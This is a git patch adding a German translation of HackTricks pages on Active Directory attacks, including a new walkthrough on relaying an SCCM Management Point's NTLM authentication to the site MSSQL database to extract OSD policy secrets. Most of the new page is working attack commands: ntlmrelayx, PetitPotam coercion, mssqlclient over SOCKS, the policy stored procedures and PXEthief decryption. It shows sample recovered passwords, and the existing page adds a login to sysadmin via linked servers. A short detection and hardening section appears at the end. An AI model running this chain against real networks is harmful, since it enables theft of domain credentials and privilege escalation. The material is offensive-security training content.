From d174bebf87758a5fdaf94e21c690f43053889544 Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 22 Jul 2025 08:30:44 +0000 Subject: [PATCH] Translated ['src/windows-hardening/active-directory-methodology/abusing- --- src/SUMMARY.md | 1 + .../abusing-ad-mssql.md | 13 +- ...nagement-point-relay-sql-policy-secrets.md | 155 ++++++++++++++++++ 3 files changed, 165 insertions(+), 4 deletions(-) create mode 100644 src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index b09540790..09ba11160 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -283,6 +283,7 @@ - [Privileged Groups](windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md) - [RDP Sessions Abuse](windows-hardening/active-directory-methodology/rdp-sessions-abuse.md) - [Resource-based Constrained Delegation](windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md) + - [Sccm Management Point Relay Sql Policy Secrets](windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md) - [Security Descriptors](windows-hardening/active-directory-methodology/security-descriptors.md) - [SID-History Injection](windows-hardening/active-directory-methodology/sid-history-injection.md) - [Silver Ticket](windows-hardening/active-directory-methodology/silver-ticket.md) diff --git a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md index 1f5a2aa37..dddcf1571 100644 --- a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md +++ b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md @@ -245,14 +245,14 @@ EXEC sp_linkedservers; ``` ![](<../../images/image (716).png>) -#### Führen Sie Abfragen in vertrauenswürdigem Link aus +#### Abfragen über vertrauenswürdigen Link ausführen Führen Sie Abfragen über den Link aus (Beispiel: Weitere Links in der neuen zugänglichen Instanz finden): ```sql select * from openquery("dcorp-sql1", 'select * from master..sysservers') ``` > [!WARNING] -> Überprüfen Sie, wo doppelte und einfache Anführungszeichen verwendet werden. Es ist wichtig, sie auf diese Weise zu verwenden. +> Überprüfen Sie, wo doppelte und einfache Anführungszeichen verwendet werden, es ist wichtig, sie auf diese Weise zu verwenden. ![](<../../images/image (643).png>) @@ -276,11 +276,16 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT ``` ## Lokale Privilegieneskalation -Der **MSSQL lokale Benutzer** hat normalerweise eine spezielle Art von Privileg, das **`SeImpersonatePrivilege`** genannt wird. Dies ermöglicht dem Konto, "einen Client nach der Authentifizierung zu impersonieren". +Der **MSSQL lokale Benutzer** hat normalerweise eine spezielle Art von Privileg, das als **`SeImpersonatePrivilege`** bezeichnet wird. Dies ermöglicht dem Konto, "einen Client nach der Authentifizierung zu impersonieren". Eine Strategie, die viele Autoren entwickelt haben, besteht darin, einen SYSTEM-Dienst zu zwingen, sich bei einem bösartigen oder Man-in-the-Middle-Dienst zu authentifizieren, den der Angreifer erstellt. Dieser bösartige Dienst kann dann den SYSTEM-Dienst impersonieren, während er versucht, sich zu authentifizieren. -[SweetPotato](https://github.com/CCob/SweetPotato) hat eine Sammlung dieser verschiedenen Techniken, die über Beacons `execute-assembly`-Befehl ausgeführt werden können. +[SweetPotato](https://github.com/CCob/SweetPotato) hat eine Sammlung dieser verschiedenen Techniken, die über den `execute-assembly` Befehl von Beacon ausgeführt werden können. +### SCCM Management Point NTLM Relay (OSD Geheimnisextraktion) +Sehen Sie, wie die Standard-SQL-Rollen von SCCM **Management Points** ausgenutzt werden können, um Network Access Account und Task-Sequence-Geheimnisse direkt aus der Standortdatenbank zu dumpen: +{{#ref}} +sccm-management-point-relay-sql-policy-secrets.md +{{#endref}} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md b/src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md new file mode 100644 index 000000000..ff41cba94 --- /dev/null +++ b/src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md @@ -0,0 +1,155 @@ +# SCCM Management Point NTLM Relay zu SQL – OSD-Policy-Geheimnisextraktion + +{{#include ../../banners/hacktricks-training.md}} + +## TL;DR +Durch das Zwingen eines **System Center Configuration Manager (SCCM) Management Point (MP)** zur Authentifizierung über SMB/RPC und das **Relaying** dieses NTLM-Maschinenkontos an die **Site-Datenbank (MSSQL)** erhalten Sie `smsdbrole_MP` / `smsdbrole_MPUserSvc` Rechte. Diese Rollen ermöglichen es Ihnen, eine Reihe von gespeicherten Prozeduren aufzurufen, die **Operating System Deployment (OSD)**-Policy-Blobs (Anmeldeinformationen für Netzwerkzugangskonten, Task-Sequence-Variablen usw.) offenlegen. Die Blobs sind hex-encodiert/verschlüsselt, können jedoch mit **PXEthief** decodiert und entschlüsselt werden, was Klartextgeheimnisse ergibt. + +High-Level-Kette: +1. Entdecken Sie MP & Site DB ↦ nicht authentifizierter HTTP-Endpunkt `/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA`. +2. Starten Sie `ntlmrelayx.py -t mssql:// -ts -socks`. +3. Zwingen Sie MP mit **PetitPotam**, PrinterBug, DFSCoerce usw. +4. Verbinden Sie sich über den SOCKS-Proxy mit `mssqlclient.py -windows-auth` als das relayed **\\$** Konto. +5. Führen Sie aus: +* `use CM_` +* `exec MP_GetMachinePolicyAssignments N'',N''` +* `exec MP_GetPolicyBody N'',N''` (oder `MP_GetPolicyBodyAfterAuthorization`) +6. Entfernen Sie `0xFFFE` BOM, `xxd -r -p` → XML → `python3 pxethief.py 7 `. + +Geheimnisse wie `OSDJoinAccount/OSDJoinPassword`, `NetworkAccessUsername/Password` usw. werden wiederhergestellt, ohne PXE oder Clients zu berühren. + +--- + +## 1. Auflisten nicht authentifizierter MP-Endpunkte +Die MP ISAPI-Erweiterung **GetAuth.dll** gibt mehrere Parameter preis, die keine Authentifizierung erfordern (es sei denn, die Site ist nur PKI): + +| Parameter | Zweck | +|-----------|---------| +| `MPKEYINFORMATIONMEDIA` | Gibt den öffentlichen Schlüssel des Site-Signaturzertifikats + GUIDs von *x86* / *x64* **All Unknown Computers** Geräten zurück. | +| `MPLIST` | Listet jeden Management-Point in der Site auf. | +| `SITESIGNCERT` | Gibt das Primär-Site-Signaturzertifikat zurück (identifiziert den Site-Server ohne LDAP). | + +Holen Sie sich die GUIDs, die als **clientID** für spätere DB-Abfragen dienen werden: +```bash +curl http://MP01.contoso.local/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA | xmllint --format - +``` +--- + +## 2. Übertragen Sie das MP-Maschinenkonto an MSSQL +```bash +# 1. Start the relay listener (SMB→TDS) +ntlmrelayx.py -ts -t mssql://10.10.10.15 -socks -smb2support + +# 2. Trigger authentication from the MP (PetitPotam example) +python3 PetitPotam.py 10.10.10.20 10.10.10.99 \ +-u alice -p P@ssw0rd! -d CONTOSO -dc-ip 10.10.10.10 +``` +Wenn die Zwangsmaßnahme ausgelöst wird, sollten Sie etwas sehen wie: +``` +[*] Authenticating against mssql://10.10.10.15 as CONTOSO/MP01$ SUCCEED +[*] SOCKS: Adding CONTOSO/MP01$@10.10.10.15(1433) +``` +--- + +## 3. Identifizieren Sie OSD-Richtlinien über gespeicherte Prozeduren +Verbinden Sie sich über den SOCKS-Proxy (Standardport 1080): +```bash +proxychains mssqlclient.py CONTOSO/MP01$@10.10.10.15 -windows-auth +``` +Wechseln Sie zur **CM_** DB (verwenden Sie den 3-stelligen Standortcode, z.B. `CM_001`). + +### 3.1 Unbekannte Computer-GUIDs finden (optional) +```sql +USE CM_001; +SELECT SMS_Unique_Identifier0 +FROM dbo.UnknownSystem_DISC +WHERE DiscArchKey = 2; -- 2 = x64, 0 = x86 +``` +### 3.2 Zugewiesene Richtlinien auflisten +```sql +EXEC MP_GetMachinePolicyAssignments N'e9cd8c06-cc50-4b05-a4b2-9c9b5a51bbe7', N''; +``` +Jede Zeile enthält `PolicyAssignmentID`, `Body` (hex), `PolicyID`, `PolicyVersion`. + +Fokus auf Richtlinien: +* **NAAConfig** – Netzwerkzugangskonto-Credentials +* **TS_Sequence** – Tasksequenzvariablen (OSDJoinAccount/Password) +* **CollectionSettings** – Kann Run-as-Konten enthalten + +### 3.3 Vollständigen Body abrufen +Wenn Sie bereits `PolicyID` & `PolicyVersion` haben, können Sie die Anforderung des clientID mit folgendem überspringen: +```sql +EXEC MP_GetPolicyBody N'{083afd7a-b0be-4756-a4ce-c31825050325}', N'2.00'; +``` +> WICHTIG: Erhöhen Sie in SSMS „Maximale abgerufene Zeichen“ (>65535), da der Blob sonst abgeschnitten wird. + +--- + +## 4. Dekodieren & Entschlüsseln des Blobs +```bash +# Remove the UTF-16 BOM, convert from hex → XML +echo 'fffe3c003f0078…' | xxd -r -p > policy.xml + +# Decrypt with PXEthief (7 = decrypt attribute value) +python3 pxethief.py 7 $(xmlstarlet sel -t -v "//value/text()" policy.xml) +``` +Wiederhergestellte Geheimnisse Beispiel: +``` +OSDJoinAccount : CONTOSO\\joiner +OSDJoinPassword: SuperSecret2025! +NetworkAccessUsername: CONTOSO\\SCCM_NAA +NetworkAccessPassword: P4ssw0rd123 +``` +--- + +## 5. Relevante SQL-Rollen & -verfahren +Beim Relay wird der Login zugeordnet zu: +* `smsdbrole_MP` +* `smsdbrole_MPUserSvc` + +Diese Rollen bieten Dutzende von EXEC-Berechtigungen, die wichtigsten, die in diesem Angriff verwendet werden, sind: + +| Gespeicherte Prozedur | Zweck | +|-----------------------|-------| +| `MP_GetMachinePolicyAssignments` | Listet die auf ein `clientID` angewendeten Richtlinien auf. | +| `MP_GetPolicyBody` / `MP_GetPolicyBodyAfterAuthorization` | Gibt den vollständigen Richtlinieninhalt zurück. | +| `MP_GetListOfMPsInSiteOSD` | Wird durch den `MPKEYINFORMATIONMEDIA`-Pfad zurückgegeben. | + +Sie können die vollständige Liste einsehen mit: +```sql +SELECT pr.name +FROM sys.database_principals AS dp +JOIN sys.database_permissions AS pe ON pe.grantee_principal_id = dp.principal_id +JOIN sys.objects AS pr ON pr.object_id = pe.major_id +WHERE dp.name IN ('smsdbrole_MP','smsdbrole_MPUserSvc') +AND pe.permission_name='EXECUTE'; +``` +--- + +## 6. Erkennung & Härtung +1. **Überwachen Sie MP-Anmeldungen** – jedes MP-Computer-Konto, das sich von einer IP anmeldet, die nicht sein Host ist ≈ Relay. +2. Aktivieren Sie **Erweiterte Schutzmaßnahmen für die Authentifizierung (EPA)** in der Standortdatenbank (`PREVENT-14`). +3. Deaktivieren Sie ungenutztes NTLM, erzwingen Sie SMB-Signierung, beschränken Sie RPC ( +die gleichen Milderungsmaßnahmen, die gegen `PetitPotam`/`PrinterBug` verwendet werden). +4. Härtung der MP ↔ DB-Kommunikation mit IPSec / mutual-TLS. + +--- + +## Siehe auch +* NTLM-Relay-Grundlagen: +{{#ref}} +../ntlm/README.md +{{#endref}} + +* MSSQL-Missbrauch & Post-Exploitation: +{{#ref}} +abusing-ad-mssql.md +{{#endref}} + + + +## Referenzen +- [Ich möchte mit Ihrem Manager sprechen: Geheimnisse mit Management Point Relays stehlen](https://specterops.io/blog/2025/07/15/id-like-to-speak-to-your-manager-stealing-secrets-with-management-point-relays/) +- [PXEthief](https://github.com/MWR-CyberSec/PXEThief) +- [Misconfiguration Manager – ELEVATE-4 & ELEVATE-5](https://github.com/subat0mik/Misconfiguration-Manager) +{{#include ../../banners/hacktricks-training.md}}